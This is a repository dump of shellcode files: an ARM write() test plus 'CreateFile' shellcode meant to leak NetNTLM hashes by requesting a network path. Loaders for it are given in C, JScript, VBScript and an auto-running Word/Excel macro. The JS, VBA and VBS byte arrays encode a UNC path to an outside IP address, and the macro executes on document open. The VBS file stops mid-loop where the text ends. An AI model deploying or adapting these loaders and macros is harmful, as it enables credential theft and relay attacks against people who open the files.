├── ARM-Write.c ├── CreateFile ├── CreateFile.c ├── CreateFile.js ├── CreateFile.vba └── CreateFile.vbs ├── Hosts.c ├── README.md ├── VBShellCode Demo └── shellcode.exe ├── chmod777.c ├── desktopscroll.c ├── hosts.asm ├── invert.c ├── makedir.asm ├── makedir_decode.asm ├── mkdir.c ├── shutdown_x86.c ├── shutdown_x86_64.c └── vhscroll.c /ARM-Write.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Title: Simple write() syscall on a Linux ARM architecture 3 | # OS: armv6l GNU/Linux 4 | # Tested on a Raspberry pi 5 | # Author: Osanda Malith Jayathissa 6 | # E-mail: osanda[cat]unseen.is 7 | 8 | Disassembly of section .text: 9 | 10 | 00008054 <_start>: 11 | 8054: e28f6001 add r6, pc, #1 12 | 8058: e12fff16 bx r6 13 | 805c: 2207 movs r2, #7 14 | 805e: 4679 mov r1, pc 15 | 8060: 310e adds r1, #14 16 | 8062: 2001 movs r0, #1 17 | 8064: 2704 movs r7, #4 18 | 8066: df01 svc 1 19 | 8068: 1b24 subs r4, r4, r4 20 | 806a: 1c20 adds r0, r4, #0 21 | 806c: 2701 movs r7, #1 22 | 806e: df01 svc 1 23 | 8070: 6e61734f cdpvs 3, 6, cr7, cr1, cr15, {2} 24 | 8074: 000a6164 andeq r6, sl, r4, ror #2 25 | */ 26 | #include 27 | #include 28 | 29 | char *shellcode = "\x01\x60\x8f\xe2" 30 | "\x16\xff\x2f\xe1" 31 | "\x07\x22" 32 | "\x79\x46" 33 | "\x0e\x31" 34 | "\x01\x20" 35 | "\x04\x27" 36 | "\x01\xdf" 37 | "\x24\x1b" 38 | "\x20\x1c" 39 | "\x01\x27" 40 | "\x01\xdf" 41 | "\x4f\x73\x61\x6e" 42 | "\x64\x61\x0a"; 43 | 44 | int main(void) { 45 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 46 | (*(void(*)()) shellcode)(); 47 | return 0; 48 | } 49 | -------------------------------------------------------------------------------- /CreateFile/CreateFile.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Osanda Malith Jayathissa (@OsandaMalith) 3 | Website: https://osandamalith.com 4 | Size: 368 Bytes 5 | Description: This shellcode uses CreateFile and tries to read a non existing 6 | network path. You can use tools such as Responder to capture NetNTLM hashes. 7 | The shellcode can be modified to steal hashes over internet. SMBRelay attacks 8 | can also be perfomed. 9 | */ 10 | # include 11 | # include 12 | # include 13 | # include 14 | 15 | int main() { 16 | 17 | char *shellcode = 18 | "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02" 19 | "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa" 20 | "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05" 21 | "\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10" 22 | "\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0" 23 | "\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8" 24 | "\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a" 25 | "\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff" 26 | "\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe" 27 | "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b" 28 | "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89" 29 | "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40" 30 | "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff" 31 | "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78" 32 | "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b" 33 | "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc" 34 | "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff" 35 | "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89" 36 | "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f" 37 | "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7" 38 | "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf" 39 | "\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32" 40 | "\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05"; 41 | 42 | DWORD oldProtect; 43 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); 44 | 45 | if (!ret) { 46 | fprintf(stderr, "%s", "Error Occured"); 47 | return EXIT_FAILURE; 48 | } 49 | 50 | ((void(*)(void))shellcode)(); 51 | 52 | VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); 53 | 54 | return EXIT_SUCCESS; 55 | } 56 | -------------------------------------------------------------------------------- /CreateFile/CreateFile.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Author : Osanda Malith Jayathissa (@OsandaMalith) 3 | * Title: Shellcode to request a non-existing network path 4 | * Website: https://osandamalith 5 | * Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html 6 | * Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04 7 | */ 8 | DX = new ActiveXObject("DynamicWrapperX"); 9 | DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"); 10 | DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" ); 11 | DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"); 12 | 13 | var MEM_COMMIT = 0x1000; 14 | var PAGE_EXECUTE_READWRITE = 0x40; 15 | 16 | var sc = [ 17 | 0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7, 18 | 0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e, 19 | 0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa, 20 | 0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0, 21 | 0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05, 22 | 0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e, 23 | 0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d, 24 | 0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b, 25 | 0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1, 26 | 0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b, 27 | 0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c, 28 | 0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b, 29 | 0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18, 30 | 0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c, 31 | 0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75, 32 | 0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7, 33 | 0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05, 34 | 0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33, 35 | 0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05]; 36 | 37 | var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 38 | for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i); 39 | var thread = DX.CreateThread(0,0,scLocation,0,0); 40 | -------------------------------------------------------------------------------- /CreateFile/CreateFile.vba: -------------------------------------------------------------------------------- 1 | ' Author : Osanda Malith Jayathissa (@OsandaMalith) 2 | ' Title: Shellcode to request a non-existing network path 3 | ' Website: https://osandamalith 4 | ' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html 5 | ' This is a word/excel macro. This can be used in vb6 applications as well 6 | 7 | #If Vba7 Then 8 | Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _ 9 | ByVal lpThreadAttributes As Long, _ 10 | ByVal dwStackSize As Long, _ 11 | ByVal lpStartAddress As LongPtr, _ 12 | lpParameter As Long, _ 13 | ByVal dwCreationFlags As Long, _ 14 | lpThreadId As Long) As LongPtr 15 | 16 | 17 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _ 18 | ByVal lpAddress As Long, _ 19 | ByVal dwSize As Long, _ 20 | ByVal flAllocationType As Long, _ 21 | ByVal flProtect As Long) As LongPtr 22 | 23 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _ 24 | ByVal Destination As LongPtr, _ 25 | ByRef Source As Any, _ 26 | ByVal Length As Long) As LongPtr 27 | 28 | #Else 29 | Private Declare Function CreateThread Lib "kernel32" ( _ 30 | ByVal lpThreadAttributes As Long, _ 31 | ByVal dwStackSize As Long, _ 32 | ByVal lpStartAddress As Long, _ 33 | lpParameter As Long, _ 34 | ByVal dwCreationFlags As Long, _ 35 | lpThreadId As Long) As Long 36 | 37 | Private Declare Function VirtualAlloc Lib "kernel32" ( _ 38 | ByVal lpAddress As Long, _ 39 | ByVal dwSize As Long, _ 40 | ByVal flAllocationType As Long, _ 41 | ByVal flProtect As Long) As Long 42 | 43 | Private Declare Function RtlMoveMemory Lib "kernel32" ( _ 44 | ByVal Destination As Long, _ 45 | ByRef Source As Any, _ 46 | ByVal Length As Long) As Long 47 | #EndIf 48 | 49 | Const MEM_COMMIT = &H1000 50 | Const PAGE_EXECUTE_READWRITE = &H40 51 | 52 | Sub Auto_Open() 53 | Dim source As Long, i As Long 54 | #If Vba7 Then 55 | Dim lpMemory As LongPtr, lResult As LongPtr 56 | #Else 57 | Dim lpMemory As Long, lResult As Long 58 | #EndIf 59 | 60 | Dim bShellcode(376) As Byte 61 | bShellcode(0) = 232 62 | bShellcode(1) = 255 63 | bShellcode(2) = 255 64 | bShellcode(3) = 255 65 | bShellcode(4) = 255 66 | bShellcode(5) = 192 67 | bShellcode(6) = 95 68 | bShellcode(7) = 185 69 | bShellcode(8) = 85 70 | bShellcode(9) = 3 71 | bShellcode(10) = 2 72 | bShellcode(11) = 2 73 | bShellcode(12) = 129 74 | bShellcode(13) = 241 75 | bShellcode(14) = 2 76 | bShellcode(15) = 2 77 | bShellcode(16) = 2 78 | bShellcode(17) = 2 79 | bShellcode(18) = 131 80 | bShellcode(19) = 199 81 | bShellcode(20) = 29 82 | bShellcode(21) = 51 83 | bShellcode(22) = 246 84 | bShellcode(23) = 252 85 | bShellcode(24) = 138 86 | bShellcode(25) = 7 87 | bShellcode(26) = 60 88 | bShellcode(27) = 5 89 | bShellcode(28) = 15 90 | bShellcode(29) = 68 91 | bShellcode(30) = 198 92 | bShellcode(31) = 170 93 | bShellcode(32) = 226 94 | bShellcode(33) = 246 95 | bShellcode(34) = 232 96 | bShellcode(35) = 5 97 | bShellcode(36) = 5 98 | bShellcode(37) = 5 99 | bShellcode(38) = 5 100 | bShellcode(39) = 94 101 | bShellcode(40) = 139 102 | bShellcode(41) = 254 103 | bShellcode(42) = 129 104 | bShellcode(43) = 198 105 | bShellcode(44) = 41 106 | bShellcode(45) = 1 107 | bShellcode(46) = 5 108 | bShellcode(47) = 5 109 | bShellcode(48) = 185 110 | bShellcode(49) = 2 111 | bShellcode(50) = 5 112 | bShellcode(51) = 5 113 | bShellcode(52) = 5 114 | bShellcode(53) = 252 115 | bShellcode(54) = 173 116 | bShellcode(55) = 1 117 | bShellcode(56) = 60 118 | bShellcode(57) = 7 119 | bShellcode(58) = 226 120 | bShellcode(59) = 250 121 | bShellcode(60) = 86 122 | bShellcode(61) = 185 123 | bShellcode(62) = 141 124 | bShellcode(63) = 16 125 | bShellcode(64) = 183 126 | bShellcode(65) = 248 127 | bShellcode(66) = 232 128 | bShellcode(67) = 95 129 | bShellcode(68) = 5 130 | bShellcode(69) = 5 131 | bShellcode(70) = 5 132 | bShellcode(71) = 104 133 | bShellcode(72) = 49 134 | bShellcode(73) = 1 135 | bShellcode(74) = 5 136 | bShellcode(75) = 5 137 | bShellcode(76) = 255 138 | bShellcode(77) = 208 139 | bShellcode(78) = 185 140 | bShellcode(79) = 224 141 | bShellcode(80) = 83 142 | bShellcode(81) = 49 143 | bShellcode(82) = 75 144 | bShellcode(83) = 232 145 | bShellcode(84) = 78 146 | bShellcode(85) = 5 147 | bShellcode(86) = 5 148 | bShellcode(87) = 5 149 | bShellcode(88) = 185 150 | bShellcode(89) = 172 151 | bShellcode(90) = 213 152 | bShellcode(91) = 170 153 | bShellcode(92) = 136 154 | bShellcode(93) = 139 155 | bShellcode(94) = 240 156 | bShellcode(95) = 232 157 | bShellcode(96) = 66 158 | bShellcode(97) = 5 159 | bShellcode(98) = 5 160 | bShellcode(99) = 5 161 | bShellcode(100) = 106 162 | bShellcode(101) = 5 163 | bShellcode(102) = 104 164 | bShellcode(103) = 128 165 | bShellcode(104) = 5 166 | bShellcode(105) = 5 167 | bShellcode(106) = 5 168 | bShellcode(107) = 106 169 | bShellcode(108) = 3 170 | bShellcode(109) = 106 171 | bShellcode(110) = 5 172 | bShellcode(111) = 106 173 | bShellcode(112) = 1 174 | bShellcode(113) = 104 175 | bShellcode(114) = 5 176 | bShellcode(115) = 5 177 | bShellcode(116) = 5 178 | bShellcode(117) = 128 179 | bShellcode(118) = 104 180 | bShellcode(119) = 62 181 | bShellcode(120) = 1 182 | bShellcode(121) = 5 183 | bShellcode(122) = 5 184 | bShellcode(123) = 255 185 | bShellcode(124) = 208 186 | bShellcode(125) = 106 187 | bShellcode(126) = 5 188 | bShellcode(127) = 255 189 | bShellcode(128) = 214 190 | bShellcode(129) = 51 191 | bShellcode(130) = 192 192 | bShellcode(131) = 94 193 | bShellcode(132) = 195 194 | bShellcode(133) = 51 195 | bShellcode(134) = 210 196 | bShellcode(135) = 235 197 | bShellcode(136) = 16 198 | bShellcode(137) = 193 199 | bShellcode(138) = 202 200 | bShellcode(139) = 13 201 | bShellcode(140) = 60 202 | bShellcode(141) = 97 203 | bShellcode(142) = 15 204 | bShellcode(143) = 190 205 | bShellcode(144) = 192 206 | bShellcode(145) = 124 207 | bShellcode(146) = 3 208 | bShellcode(147) = 131 209 | bShellcode(148) = 232 210 | bShellcode(149) = 32 211 | bShellcode(150) = 3 212 | bShellcode(151) = 208 213 | bShellcode(152) = 65 214 | bShellcode(153) = 138 215 | bShellcode(154) = 1 216 | bShellcode(155) = 132 217 | bShellcode(156) = 192 218 | bShellcode(157) = 117 219 | bShellcode(158) = 234 220 | bShellcode(159) = 139 221 | bShellcode(160) = 194 222 | bShellcode(161) = 195 223 | bShellcode(162) = 141 224 | bShellcode(163) = 65 225 | bShellcode(164) = 248 226 | bShellcode(165) = 195 227 | bShellcode(166) = 85 228 | bShellcode(167) = 139 229 | bShellcode(168) = 236 230 | bShellcode(169) = 131 231 | bShellcode(170) = 236 232 | bShellcode(171) = 20 233 | bShellcode(172) = 83 234 | bShellcode(173) = 86 235 | bShellcode(174) = 87 236 | bShellcode(175) = 137 237 | bShellcode(176) = 77 238 | bShellcode(177) = 244 239 | bShellcode(178) = 100 240 | bShellcode(179) = 161 241 | bShellcode(180) = 48 242 | bShellcode(181) = 5 243 | bShellcode(182) = 5 244 | bShellcode(183) = 5 245 | bShellcode(184) = 137 246 | bShellcode(185) = 69 247 | bShellcode(186) = 252 248 | bShellcode(187) = 139 249 | bShellcode(188) = 69 250 | bShellcode(189) = 252 251 | bShellcode(190) = 139 252 | bShellcode(191) = 64 253 | bShellcode(192) = 12 254 | bShellcode(193) = 139 255 | bShellcode(194) = 64 256 | bShellcode(195) = 20 257 | bShellcode(196) = 137 258 | bShellcode(197) = 69 259 | bShellcode(198) = 236 260 | bShellcode(199) = 139 261 | bShellcode(200) = 248 262 | bShellcode(201) = 139 263 | bShellcode(202) = 207 264 | bShellcode(203) = 232 265 | bShellcode(204) = 210 266 | bShellcode(205) = 255 267 | bShellcode(206) = 255 268 | bShellcode(207) = 255 269 | bShellcode(208) = 139 270 | bShellcode(209) = 112 271 | bShellcode(210) = 24 272 | bShellcode(211) = 139 273 | bShellcode(212) = 63 274 | bShellcode(213) = 133 275 | bShellcode(214) = 246 276 | bShellcode(215) = 116 277 | bShellcode(216) = 79 278 | bShellcode(217) = 139 279 | bShellcode(218) = 70 280 | bShellcode(219) = 60 281 | bShellcode(220) = 139 282 | bShellcode(221) = 92 283 | bShellcode(222) = 48 284 | bShellcode(223) = 120 285 | bShellcode(224) = 133 286 | bShellcode(225) = 219 287 | bShellcode(226) = 116 288 | bShellcode(227) = 68 289 | bShellcode(228) = 139 290 | bShellcode(229) = 76 291 | bShellcode(230) = 51 292 | bShellcode(231) = 12 293 | bShellcode(232) = 3 294 | bShellcode(233) = 206 295 | bShellcode(234) = 232 296 | bShellcode(235) = 150 297 | bShellcode(236) = 255 298 | bShellcode(237) = 255 299 | bShellcode(238) = 255 300 | bShellcode(239) = 139 301 | bShellcode(240) = 76 302 | bShellcode(241) = 51 303 | bShellcode(242) = 32 304 | bShellcode(243) = 137 305 | bShellcode(244) = 69 306 | bShellcode(245) = 248 307 | bShellcode(246) = 51 308 | bShellcode(247) = 192 309 | bShellcode(248) = 3 310 | bShellcode(249) = 206 311 | bShellcode(250) = 137 312 | bShellcode(251) = 77 313 | bShellcode(252) = 240 314 | bShellcode(253) = 137 315 | bShellcode(254) = 69 316 | bShellcode(255) = 252 317 | bShellcode(256) = 57 318 | bShellcode(257) = 68 319 | bShellcode(258) = 51 320 | bShellcode(259) = 24 321 | bShellcode(260) = 118 322 | bShellcode(261) = 34 323 | bShellcode(262) = 139 324 | bShellcode(263) = 12 325 | bShellcode(264) = 129 326 | bShellcode(265) = 3 327 | bShellcode(266) = 206 328 | bShellcode(267) = 232 329 | bShellcode(268) = 117 330 | bShellcode(269) = 255 331 | bShellcode(270) = 255 332 | bShellcode(271) = 255 333 | bShellcode(272) = 3 334 | bShellcode(273) = 69 335 | bShellcode(274) = 248 336 | bShellcode(275) = 57 337 | bShellcode(276) = 69 338 | bShellcode(277) = 244 339 | bShellcode(278) = 116 340 | bShellcode(279) = 28 341 | bShellcode(280) = 139 342 | bShellcode(281) = 69 343 | bShellcode(282) = 252 344 | bShellcode(283) = 139 345 | bShellcode(284) = 77 346 | bShellcode(285) = 240 347 | bShellcode(286) = 64 348 | bShellcode(287) = 137 349 | bShellcode(288) = 69 350 | bShellcode(289) = 252 351 | bShellcode(290) = 59 352 | bShellcode(291) = 68 353 | bShellcode(292) = 51 354 | bShellcode(293) = 24 355 | bShellcode(294) = 114 356 | bShellcode(295) = 222 357 | bShellcode(296) = 59 358 | bShellcode(297) = 125 359 | bShellcode(298) = 236 360 | bShellcode(299) = 117 361 | bShellcode(300) = 156 362 | bShellcode(301) = 51 363 | bShellcode(302) = 192 364 | bShellcode(303) = 95 365 | bShellcode(304) = 94 366 | bShellcode(305) = 91 367 | bShellcode(306) = 201 368 | bShellcode(307) = 195 369 | bShellcode(308) = 139 370 | bShellcode(309) = 77 371 | bShellcode(310) = 252 372 | bShellcode(311) = 139 373 | bShellcode(312) = 68 374 | bShellcode(313) = 51 375 | bShellcode(314) = 36 376 | bShellcode(315) = 141 377 | bShellcode(316) = 4 378 | bShellcode(317) = 72 379 | bShellcode(318) = 15 380 | bShellcode(319) = 183 381 | bShellcode(320) = 12 382 | bShellcode(321) = 48 383 | bShellcode(322) = 139 384 | bShellcode(323) = 68 385 | bShellcode(324) = 51 386 | bShellcode(325) = 28 387 | bShellcode(326) = 141 388 | bShellcode(327) = 4 389 | bShellcode(328) = 136 390 | bShellcode(329) = 139 391 | bShellcode(330) = 4 392 | bShellcode(331) = 48 393 | bShellcode(332) = 3 394 | bShellcode(333) = 198 395 | bShellcode(334) = 235 396 | bShellcode(335) = 223 397 | bShellcode(336) = 33 398 | bShellcode(337) = 5 399 | bShellcode(338) = 5 400 | bShellcode(339) = 5 401 | bShellcode(340) = 80 402 | bShellcode(341) = 5 403 | bShellcode(342) = 5 404 | bShellcode(343) = 5 405 | bShellcode(344) = 107 406 | bShellcode(345) = 101 407 | bShellcode(346) = 114 408 | bShellcode(347) = 110 409 | bShellcode(348) = 101 410 | bShellcode(349) = 108 411 | bShellcode(350) = 51 412 | bShellcode(351) = 50 413 | bShellcode(352) = 46 414 | bShellcode(353) = 100 415 | bShellcode(354) = 108 416 | bShellcode(355) = 108 417 | bShellcode(356) = 5 418 | bShellcode(357) = 47 419 | bShellcode(358) = 47 420 | bShellcode(359) = 51 421 | bShellcode(360) = 53 422 | bShellcode(361) = 46 423 | bShellcode(362) = 49 424 | bShellcode(363) = 54 425 | bShellcode(364) = 52 426 | bShellcode(365) = 46 427 | bShellcode(366) = 49 428 | bShellcode(367) = 53 429 | bShellcode(368) = 51 430 | bShellcode(369) = 46 431 | bShellcode(370) = 50 432 | bShellcode(371) = 50 433 | bShellcode(372) = 52 434 | bShellcode(373) = 47 435 | bShellcode(374) = 97 436 | bShellcode(375) = 97 437 | bShellcode(376) = 5 438 | 439 | lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) 440 | For i = LBound(bShellcode) To UBound(bShellcode) 441 | source = bShellcode(i) 442 | lResult = RtlMoveMemory(lpMemory + i, source, 1) 443 | Next i 444 | lResult = CreateThread(0, 0, lpMemory, 0, 0, 0) 445 | End Sub 446 | Sub AutoOpen() 447 | Auto_Open 448 | End Sub 449 | Sub Workbook_Open() 450 | Auto_Open 451 | End Sub 452 | -------------------------------------------------------------------------------- /CreateFile/CreateFile.vbs: -------------------------------------------------------------------------------- 1 | ' Author : Osanda Malith Jayathissa (@OsandaMalith) 2 | ' Title: Shellcode to request a non-existing network path 3 | ' Website: https://osandamalith 4 | ' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html 5 | ' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04 6 | 7 | Set DX = CreateObject("DynamicWrapperX") 8 | DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u" 9 | DX.Register "kernel32.dll","CreateThread","i=uullu","r=u" 10 | DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u" 11 | 12 | Const MEM_COMMIT = &H1000 13 | Const PAGE_EXECUTE_READWRITE = &H40 14 | 15 | shellcode = Array( _ 16 | &He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _ 17 | &H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _ 18 | &H8b, &Hfe, &H81, &Hc6, &H29, &H01, &H05, &H05, &Hb9, &H02, &H05, &H05, &H05, &Hfc, &Had, &H01, &H3c, &H07, &He2, &Hfa, _ 19 | &H56, &Hb9, &H8d, &H10, &Hb7, &Hf8, &He8, &H5f, &H05, &H05, &H05, &H68, &H31, &H01, &H05, &H05, &Hff, &Hd0, &Hb9, &He0, _ 20 | &H53, &H31, &H4b, &He8, &H4e, &H05, &H05, &H05, &Hb9, &Hac, &Hd5, &Haa, &H88, &H8b, &Hf0, &He8, &H42, &H05, &H05, &H05, _ 21 | &H6a, &H05, &H68, &H80, &H05, &H05, &H05, &H6a, &H03, &H6a, &H05, &H6a, &H01, &H68, &H05, &H05, &H05, &H80, &H68, &H3e, _ 22 | &H01, &H05, &H05, &Hff, &Hd0, &H6a, &H05, &Hff, &Hd6, &H33, &Hc0, &H5e, &Hc3, &H33, &Hd2, &Heb, &H10, &Hc1, &Hca, &H0d, _ 23 | &H3c, &H61, &H0f, &Hbe, &Hc0, &H7c, &H03, &H83, &He8, &H20, &H03, &Hd0, &H41, &H8a, &H01, &H84, &Hc0, &H75, &Hea, &H8b, _ 24 | &Hc2, &Hc3, &H8d, &H41, &Hf8, &Hc3, &H55, &H8b, &Hec, &H83, &Hec, &H14, &H53, &H56, &H57, &H89, &H4d, &Hf4, &H64, &Ha1, _ 25 | &H30, &H05, &H05, &H05, &H89, &H45, &Hfc, &H8b, &H45, &Hfc, &H8b, &H40, &H0c, &H8b, &H40, &H14, &H89, &H45, &Hec, &H8b, _ 26 | &Hf8, &H8b, &Hcf, &He8, &Hd2, &Hff, &Hff, &Hff, &H8b, &H70, &H18, &H8b, &H3f, &H85, &Hf6, &H74, &H4f, &H8b, &H46, &H3c, _ 27 | &H8b, &H5c, &H30, &H78, &H85, &Hdb, &H74, &H44, &H8b, &H4c, &H33, &H0c, &H03, &Hce, &He8, &H96, &Hff, &Hff, &Hff, &H8b, _ 28 | &H4c, &H33, &H20, &H89, &H45, &Hf8, &H33, &Hc0, &H03, &Hce, &H89, &H4d, &Hf0, &H89, &H45, &Hfc, &H39, &H44, &H33, &H18, _ 29 | &H76, &H22, &H8b, &H0c, &H81, &H03, &Hce, &He8, &H75, &Hff, &Hff, &Hff, &H03, &H45, &Hf8, &H39, &H45, &Hf4, &H74, &H1c, _ 30 | &H8b, &H45, &Hfc, &H8b, &H4d, &Hf0, &H40, &H89, &H45, &Hfc, &H3b, &H44, &H33, &H18, &H72, &Hde, &H3b, &H7d, &Hec, &H75, _ 31 | &H9c, &H33, &Hc0, &H5f, &H5e, &H5b, &Hc9, &Hc3, &H8b, &H4d, &Hfc, &H8b, &H44, &H33, &H24, &H8d, &H04, &H48, &H0f, &Hb7, _ 32 | &H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _ 33 | &H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _ 34 | &H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05) 35 | 36 | scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) 37 | 38 | For i =LBound(shellcode) to UBound(shellcode) 